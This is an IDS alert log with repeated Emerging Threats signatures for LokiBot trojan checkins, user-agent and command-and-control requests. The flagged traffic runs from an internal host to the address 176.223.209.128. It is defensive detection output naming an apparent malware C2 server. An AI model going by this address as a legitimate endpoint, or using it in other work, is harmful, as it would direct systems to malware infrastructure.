11/25/21-10:50:10.703556	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50078	80	192.168.11.20	176.223.209.128
11/25/21-10:50:10.703556	TCP	2025381	ET TROJAN LokiBot Checkin	50078	80	192.168.11.20	176.223.209.128
11/25/21-10:50:10.703556	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50078	80	192.168.11.20	176.223.209.128
11/25/21-10:50:11.205022	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50079	80	192.168.11.20	176.223.209.128
11/25/21-10:50:11.205022	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50079	80	192.168.11.20	176.223.209.128
11/25/21-10:50:11.205022	TCP	2025381	ET TROJAN LokiBot Checkin	50079	80	192.168.11.20	176.223.209.128
11/25/21-10:50:11.205022	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50079	80	192.168.11.20	176.223.209.128
11/25/21-10:50:11.714368	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50080	80	192.168.11.20	176.223.209.128
11/25/21-10:50:11.714368	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50080	80	192.168.11.20	176.223.209.128
11/25/21-10:50:11.714368	TCP	2025381	ET TROJAN LokiBot Checkin	50080	80	192.168.11.20	176.223.209.128
11/25/21-10:50:11.714368	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50080	80	192.168.11.20	176.223.209.128
11/25/21-10:50:12.226092	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50081	80	192.168.11.20	176.223.209.128
11/25/21-10:50:12.226092	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50081	80	192.168.11.20	176.223.209.128
11/25/21-10:50:12.226092	TCP	2025381	ET TROJAN LokiBot Checkin	50081	80	192.168.11.20	176.223.209.128
11/25/21-10:50:12.226092	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50081	80	192.168.11.20	176.223.209.128
11/25/21-10:50:12.706710	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50082	80	192.168.11.20	176.223.209.128
11/25/21-10:50:12.706710	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50082	80	192.168.11.20	176.223.209.128
11/25/21-10:50:12.706710	TCP	2025381	ET TROJAN LokiBot Checkin	50082	80	192.168.11.20	176.223.209.128
11/25/21-10:50:12.706710	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50082	80	192.168.11.20	176.223.209.128
11/25/21-10:50:13.215745	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50083	80	192.168.11.20	176.223.209.128
11/25/21-10:50:13.215745	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50083	80	192.168.11.20	176.223.209.128
11/25/21-10:50:13.215745	TCP	2025381	ET TROJAN LokiBot Checkin	50083	80	192.168.11.20	176.223.209.128
11/25/21-10:50:13.215745	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50083	80	192.168.11.20	176.223.209.128
11/25/21-10:50:13.714873	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50084	80	192.168.11.20	176.223.209.128
11/25/21-10:50:13.714873	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50084	80	192.168.11.20	176.223.209.128
11/25/21-10:50:13.714873	TCP	2025381	ET TROJAN LokiBot Checkin	50084	80	192.168.11.20	176.223.209.128
11/25/21-10:50:13.714873	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50084	80	192.168.11.20	176.223.209.128
11/25/21-10:50:14.199511	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50085	80	192.168.11.20	176.223.209.128
11/25/21-10:50:14.199511	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50085	80	192.168.11.20	176.223.209.128
11/25/21-10:50:14.199511	TCP	2025381	ET TROJAN LokiBot Checkin	50085	80	192.168.11.20	176.223.209.128
11/25/21-10:50:14.199511	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50085	80	192.168.11.20	176.223.209.128
11/25/21-10:50:14.643842	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50086	80	192.168.11.20	176.223.209.128
11/25/21-10:50:14.643842	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50086	80	192.168.11.20	176.223.209.128
11/25/21-10:50:14.643842	TCP	2025381	ET TROJAN LokiBot Checkin	50086	80	192.168.11.20	176.223.209.128
11/25/21-10:50:14.643842	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50086	80	192.168.11.20	176.223.209.128
11/25/21-10:50:15.146124	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50087	80	192.168.11.20	176.223.209.128
11/25/21-10:50:15.146124	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50087	80	192.168.11.20	176.223.209.128
11/25/21-10:50:15.146124	TCP	2025381	ET TROJAN LokiBot Checkin	50087	80	192.168.11.20	176.223.209.128
11/25/21-10:50:15.146124	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50087	80	192.168.11.20	176.223.209.128
11/25/21-10:50:15.653331	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50088	80	192.168.11.20	176.223.209.128
11/25/21-10:50:15.653331	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50088	80	192.168.11.20	176.223.209.128
11/25/21-10:50:15.653331	TCP	2025381	ET TROJAN LokiBot Checkin	50088	80	192.168.11.20	176.223.209.128
11/25/21-10:50:15.653331	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50088	80	192.168.11.20	176.223.209.128
11/25/21-10:50:16.166462	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50089	80	192.168.11.20	176.223.209.128
11/25/21-10:50:16.166462	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50089	80	192.168.11.20	176.223.209.128
11/25/21-10:50:16.166462	TCP	2025381	ET TROJAN LokiBot Checkin	50089	80	192.168.11.20	176.223.209.128
11/25/21-10:50:16.166462	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50089	80	192.168.11.20	176.223.209.128
11/25/21-10:50:16.686571	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50090	80	192.168.11.20	176.223.209.128
11/25/21-10:50:16.686571	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50090	80	192.168.11.20	176.223.209.128
11/25/21-10:50:16.686571	TCP	2025381	ET TROJAN LokiBot Checkin	50090	80	192.168.11.20	176.223.209.128
11/25/21-10:50:16.686571	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50090	80	192.168.11.20	176.223.209.128
11/25/21-10:50:17.195199	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50091	80	192.168.11.20	176.223.209.128
11/25/21-10:50:17.195199	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50091	80	192.168.11.20	176.223.209.128
11/25/21-10:50:17.195199	TCP	2025381	ET TROJAN LokiBot Checkin	50091	80	192.168.11.20	176.223.209.128
11/25/21-10:50:17.195199	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50091	80	192.168.11.20	176.223.209.128
11/25/21-10:50:17.638429	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50092	80	192.168.11.20	176.223.209.128
11/25/21-10:50:17.638429	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50092	80	192.168.11.20	176.223.209.128
11/25/21-10:50:17.638429	TCP	2025381	ET TROJAN LokiBot Checkin	50092	80	192.168.11.20	176.223.209.128
11/25/21-10:50:17.638429	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50092	80	192.168.11.20	176.223.209.128
11/25/21-10:50:18.158986	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50093	80	192.168.11.20	176.223.209.128
11/25/21-10:50:18.158986	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50093	80	192.168.11.20	176.223.209.128
11/25/21-10:50:18.158986	TCP	2025381	ET TROJAN LokiBot Checkin	50093	80	192.168.11.20	176.223.209.128
11/25/21-10:50:18.158986	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50093	80	192.168.11.20	176.223.209.128
11/25/21-10:50:18.673645	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50094	80	192.168.11.20	176.223.209.128
11/25/21-10:50:18.673645	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50094	80	192.168.11.20	176.223.209.128
11/25/21-10:50:18.673645	TCP	2025381	ET TROJAN LokiBot Checkin	50094	80	192.168.11.20	176.223.209.128
11/25/21-10:50:18.673645	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50094	80	192.168.11.20	176.223.209.128
11/25/21-10:50:19.184222	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50095	80	192.168.11.20	176.223.209.128
11/25/21-10:50:19.184222	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50095	80	192.168.11.20	176.223.209.128
11/25/21-10:50:19.184222	TCP	2025381	ET TROJAN LokiBot Checkin	50095	80	192.168.11.20	176.223.209.128
11/25/21-10:50:19.184222	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50095	80	192.168.11.20	176.223.209.128
11/25/21-10:50:19.685636	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50096	80	192.168.11.20	176.223.209.128
11/25/21-10:50:19.685636	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50096	80	192.168.11.20	176.223.209.128
11/25/21-10:50:19.685636	TCP	2025381	ET TROJAN LokiBot Checkin	50096	80	192.168.11.20	176.223.209.128
11/25/21-10:50:19.685636	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50096	80	192.168.11.20	176.223.209.128
11/25/21-10:50:20.207253	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50097	80	192.168.11.20	176.223.209.128
11/25/21-10:50:20.207253	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50097	80	192.168.11.20	176.223.209.128
11/25/21-10:50:20.207253	TCP	2025381	ET TROJAN LokiBot Checkin	50097	80	192.168.11.20	176.223.209.128
11/25/21-10:50:20.207253	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50097	80	192.168.11.20	176.223.209.128
11/25/21-10:50:20.723424	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50098	80	192.168.11.20	176.223.209.128
11/25/21-10:50:20.723424	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50098	80	192.168.11.20	176.223.209.128
11/25/21-10:50:20.723424	TCP	2025381	ET TROJAN LokiBot Checkin	50098	80	192.168.11.20	176.223.209.128
11/25/21-10:50:20.723424	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50098	80	192.168.11.20	176.223.209.128
11/25/21-10:50:21.159997	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50099	80	192.168.11.20	176.223.209.128
11/25/21-10:50:21.159997	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50099	80	192.168.11.20	176.223.209.128
11/25/21-10:50:21.159997	TCP	2025381	ET TROJAN LokiBot Checkin	50099	80	192.168.11.20	176.223.209.128
11/25/21-10:50:21.159997	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50099	80	192.168.11.20	176.223.209.128
11/25/21-10:50:21.648991	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50100	80	192.168.11.20	176.223.209.128
11/25/21-10:50:21.648991	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50100	80	192.168.11.20	176.223.209.128
11/25/21-10:50:21.648991	TCP	2025381	ET TROJAN LokiBot Checkin	50100	80	192.168.11.20	176.223.209.128
11/25/21-10:50:21.648991	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50100	80	192.168.11.20	176.223.209.128
11/25/21-10:50:22.166713	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50101	80	192.168.11.20	176.223.209.128
11/25/21-10:50:22.166713	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50101	80	192.168.11.20	176.223.209.128
11/25/21-10:50:22.166713	TCP	2025381	ET TROJAN LokiBot Checkin	50101	80	192.168.11.20	176.223.209.128
11/25/21-10:50:22.166713	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50101	80	192.168.11.20	176.223.209.128
11/25/21-10:50:22.680856	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50102	80	192.168.11.20	176.223.209.128
11/25/21-10:50:22.680856	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50102	80	192.168.11.20	176.223.209.128
11/25/21-10:50:22.680856	TCP	2025381	ET TROJAN LokiBot Checkin	50102	80	192.168.11.20	176.223.209.128
11/25/21-10:50:22.680856	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50102	80	192.168.11.20	176.223.209.128
11/25/21-10:50:23.190149	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50103	80	192.168.11.20	176.223.209.128
11/25/21-10:50:23.190149	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50103	80	192.168.11.20	176.223.209.128
11/25/21-10:50:23.190149	TCP	2025381	ET TROJAN LokiBot Checkin	50103	80	192.168.11.20	176.223.209.128
11/25/21-10:50:23.190149	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50103	80	192.168.11.20	176.223.209.128
11/25/21-10:50:23.717956	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50104	80	192.168.11.20	176.223.209.128
11/25/21-10:50:23.717956	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50104	80	192.168.11.20	176.223.209.128
11/25/21-10:50:23.717956	TCP	2025381	ET TROJAN LokiBot Checkin	50104	80	192.168.11.20	176.223.209.128
11/25/21-10:50:23.717956	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50104	80	192.168.11.20	176.223.209.128
11/25/21-10:50:24.185756	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50105	80	192.168.11.20	176.223.209.128
11/25/21-10:50:24.185756	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50105	80	192.168.11.20	176.223.209.128
11/25/21-10:50:24.185756	TCP	2025381	ET TROJAN LokiBot Checkin	50105	80	192.168.11.20	176.223.209.128
11/25/21-10:50:24.185756	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50105	80	192.168.11.20	176.223.209.128
11/25/21-10:50:24.703007	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50106	80	192.168.11.20	176.223.209.128
11/25/21-10:50:24.703007	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50106	80	192.168.11.20	176.223.209.128
11/25/21-10:50:24.703007	TCP	2025381	ET TROJAN LokiBot Checkin	50106	80	192.168.11.20	176.223.209.128
11/25/21-10:50:24.703007	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50106	80	192.168.11.20	176.223.209.128
11/25/21-10:50:25.332854	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50107	80	192.168.11.20	176.223.209.128
11/25/21-10:50:25.332854	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50107	80	192.168.11.20	176.223.209.128
11/25/21-10:50:25.332854	TCP	2025381	ET TROJAN LokiBot Checkin	50107	80	192.168.11.20	176.223.209.128
11/25/21-10:50:25.332854	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50107	80	192.168.11.20	176.223.209.128
11/25/21-10:50:26.078077	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50108	80	192.168.11.20	176.223.209.128
11/25/21-10:50:26.078077	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50108	80	192.168.11.20	176.223.209.128
11/25/21-10:50:26.078077	TCP	2025381	ET TROJAN LokiBot Checkin	50108	80	192.168.11.20	176.223.209.128
11/25/21-10:50:26.078077	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50108	80	192.168.11.20	176.223.209.128
11/25/21-10:50:26.807858	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50109	80	192.168.11.20	176.223.209.128
11/25/21-10:50:26.807858	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50109	80	192.168.11.20	176.223.209.128
11/25/21-10:50:26.807858	TCP	2025381	ET TROJAN LokiBot Checkin	50109	80	192.168.11.20	176.223.209.128
11/25/21-10:50:26.807858	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50109	80	192.168.11.20	176.223.209.128
11/25/21-10:50:27.596260	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50110	80	192.168.11.20	176.223.209.128
11/25/21-10:50:27.596260	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50110	80	192.168.11.20	176.223.209.128
11/25/21-10:50:27.596260	TCP	2025381	ET TROJAN LokiBot Checkin	50110	80	192.168.11.20	176.223.209.128
11/25/21-10:50:27.596260	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50110	80	192.168.11.20	176.223.209.128
11/25/21-10:50:28.402048	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50111	80	192.168.11.20	176.223.209.128
11/25/21-10:50:28.402048	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50111	80	192.168.11.20	176.223.209.128
11/25/21-10:50:28.402048	TCP	2025381	ET TROJAN LokiBot Checkin	50111	80	192.168.11.20	176.223.209.128
11/25/21-10:50:28.402048	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50111	80	192.168.11.20	176.223.209.128
11/25/21-10:50:28.896038	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50112	80	192.168.11.20	176.223.209.128
11/25/21-10:50:28.896038	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50112	80	192.168.11.20	176.223.209.128
11/25/21-10:50:28.896038	TCP	2025381	ET TROJAN LokiBot Checkin	50112	80	192.168.11.20	176.223.209.128
11/25/21-10:50:28.896038	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50112	80	192.168.11.20	176.223.209.128
11/25/21-10:50:29.419476	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50113	80	192.168.11.20	176.223.209.128
11/25/21-10:50:29.419476	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50113	80	192.168.11.20	176.223.209.128
11/25/21-10:50:29.419476	TCP	2025381	ET TROJAN LokiBot Checkin	50113	80	192.168.11.20	176.223.209.128
11/25/21-10:50:29.419476	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50113	80	192.168.11.20	176.223.209.128
11/25/21-10:50:29.941230	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50114	80	192.168.11.20	176.223.209.128
11/25/21-10:50:29.941230	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50114	80	192.168.11.20	176.223.209.128
11/25/21-10:50:29.941230	TCP	2025381	ET TROJAN LokiBot Checkin	50114	80	192.168.11.20	176.223.209.128
11/25/21-10:50:29.941230	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50114	80	192.168.11.20	176.223.209.128
11/25/21-10:50:30.460479	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50115	80	192.168.11.20	176.223.209.128
11/25/21-10:50:30.460479	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50115	80	192.168.11.20	176.223.209.128
11/25/21-10:50:30.460479	TCP	2025381	ET TROJAN LokiBot Checkin	50115	80	192.168.11.20	176.223.209.128
11/25/21-10:50:30.460479	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50115	80	192.168.11.20	176.223.209.128
11/25/21-10:50:30.962182	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50116	80	192.168.11.20	176.223.209.128
11/25/21-10:50:30.962182	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50116	80	192.168.11.20	176.223.209.128
11/25/21-10:50:30.962182	TCP	2025381	ET TROJAN LokiBot Checkin	50116	80	192.168.11.20	176.223.209.128
11/25/21-10:50:30.962182	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50116	80	192.168.11.20	176.223.209.128
11/25/21-10:50:31.469315	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50117	80	192.168.11.20	176.223.209.128
11/25/21-10:50:31.469315	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50117	80	192.168.11.20	176.223.209.128
11/25/21-10:50:31.469315	TCP	2025381	ET TROJAN LokiBot Checkin	50117	80	192.168.11.20	176.223.209.128
11/25/21-10:50:31.469315	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50117	80	192.168.11.20	176.223.209.128
11/25/21-10:50:31.996695	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50118	80	192.168.11.20	176.223.209.128
11/25/21-10:50:31.996695	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50118	80	192.168.11.20	176.223.209.128
11/25/21-10:50:31.996695	TCP	2025381	ET TROJAN LokiBot Checkin	50118	80	192.168.11.20	176.223.209.128
11/25/21-10:50:31.996695	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50118	80	192.168.11.20	176.223.209.128
11/25/21-10:50:32.501488	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50119	80	192.168.11.20	176.223.209.128
11/25/21-10:50:32.501488	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50119	80	192.168.11.20	176.223.209.128
11/25/21-10:50:32.501488	TCP	2025381	ET TROJAN LokiBot Checkin	50119	80	192.168.11.20	176.223.209.128
11/25/21-10:50:32.501488	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50119	80	192.168.11.20	176.223.209.128
11/25/21-10:50:33.031278	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50120	80	192.168.11.20	176.223.209.128
11/25/21-10:50:33.031278	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50120	80	192.168.11.20	176.223.209.128
11/25/21-10:50:33.031278	TCP	2025381	ET TROJAN LokiBot Checkin	50120	80	192.168.11.20	176.223.209.128
11/25/21-10:50:33.031278	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50120	80	192.168.11.20	176.223.209.128
11/25/21-10:50:33.541841	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50121	80	192.168.11.20	176.223.209.128
11/25/21-10:50:33.541841	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50121	80	192.168.11.20	176.223.209.128
11/25/21-10:50:33.541841	TCP	2025381	ET TROJAN LokiBot Checkin	50121	80	192.168.11.20	176.223.209.128
11/25/21-10:50:33.541841	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50121	80	192.168.11.20	176.223.209.128
11/25/21-10:50:34.090399	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50122	80	192.168.11.20	176.223.209.128
11/25/21-10:50:34.090399	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50122	80	192.168.11.20	176.223.209.128
11/25/21-10:50:34.090399	TCP	2025381	ET TROJAN LokiBot Checkin	50122	80	192.168.11.20	176.223.209.128
11/25/21-10:50:34.090399	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50122	80	192.168.11.20	176.223.209.128
11/25/21-10:50:34.608634	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50123	80	192.168.11.20	176.223.209.128
11/25/21-10:50:34.608634	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50123	80	192.168.11.20	176.223.209.128
11/25/21-10:50:34.608634	TCP	2025381	ET TROJAN LokiBot Checkin	50123	80	192.168.11.20	176.223.209.128
11/25/21-10:50:34.608634	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50123	80	192.168.11.20	176.223.209.128
11/25/21-10:50:35.099444	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50124	80	192.168.11.20	176.223.209.128
11/25/21-10:50:35.099444	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50124	80	192.168.11.20	176.223.209.128
11/25/21-10:50:35.099444	TCP	2025381	ET TROJAN LokiBot Checkin	50124	80	192.168.11.20	176.223.209.128
11/25/21-10:50:35.099444	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50124	80	192.168.11.20	176.223.209.128
11/25/21-10:50:35.566498	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50125	80	192.168.11.20	176.223.209.128
11/25/21-10:50:35.566498	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50125	80	192.168.11.20	176.223.209.128
11/25/21-10:50:35.566498	TCP	2025381	ET TROJAN LokiBot Checkin	50125	80	192.168.11.20	176.223.209.128
11/25/21-10:50:35.566498	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50125	80	192.168.11.20	176.223.209.128
11/25/21-10:50:36.059383	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50126	80	192.168.11.20	176.223.209.128
11/25/21-10:50:36.059383	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50126	80	192.168.11.20	176.223.209.128
11/25/21-10:50:36.059383	TCP	2025381	ET TROJAN LokiBot Checkin	50126	80	192.168.11.20	176.223.209.128
11/25/21-10:50:36.059383	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50126	80	192.168.11.20	176.223.209.128
11/25/21-10:50:36.558923	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50127	80	192.168.11.20	176.223.209.128
11/25/21-10:50:36.558923	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50127	80	192.168.11.20	176.223.209.128
11/25/21-10:50:36.558923	TCP	2025381	ET TROJAN LokiBot Checkin	50127	80	192.168.11.20	176.223.209.128
11/25/21-10:50:36.558923	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50127	80	192.168.11.20	176.223.209.128
11/25/21-10:50:37.058804	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50128	80	192.168.11.20	176.223.209.128
11/25/21-10:50:37.058804	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50128	80	192.168.11.20	176.223.209.128
11/25/21-10:50:37.058804	TCP	2025381	ET TROJAN LokiBot Checkin	50128	80	192.168.11.20	176.223.209.128
11/25/21-10:50:37.058804	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50128	80	192.168.11.20	176.223.209.128
11/25/21-10:50:37.561802	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50129	80	192.168.11.20	176.223.209.128
11/25/21-10:50:37.561802	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50129	80	192.168.11.20	176.223.209.128
11/25/21-10:50:37.561802	TCP	2025381	ET TROJAN LokiBot Checkin	50129	80	192.168.11.20	176.223.209.128
11/25/21-10:50:37.561802	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50129	80	192.168.11.20	176.223.209.128
11/25/21-10:50:38.063390	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50130	80	192.168.11.20	176.223.209.128
11/25/21-10:50:38.063390	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50130	80	192.168.11.20	176.223.209.128
11/25/21-10:50:38.063390	TCP	2025381	ET TROJAN LokiBot Checkin	50130	80	192.168.11.20	176.223.209.128
11/25/21-10:50:38.063390	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50130	80	192.168.11.20	176.223.209.128
11/25/21-10:50:38.501799	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50131	80	192.168.11.20	176.223.209.128
11/25/21-10:50:38.501799	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50131	80	192.168.11.20	176.223.209.128
11/25/21-10:50:38.501799	TCP	2025381	ET TROJAN LokiBot Checkin	50131	80	192.168.11.20	176.223.209.128
11/25/21-10:50:38.501799	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50131	80	192.168.11.20	176.223.209.128
11/25/21-10:50:38.984853	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50132	80	192.168.11.20	176.223.209.128
11/25/21-10:50:38.984853	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50132	80	192.168.11.20	176.223.209.128
11/25/21-10:50:38.984853	TCP	2025381	ET TROJAN LokiBot Checkin	50132	80	192.168.11.20	176.223.209.128
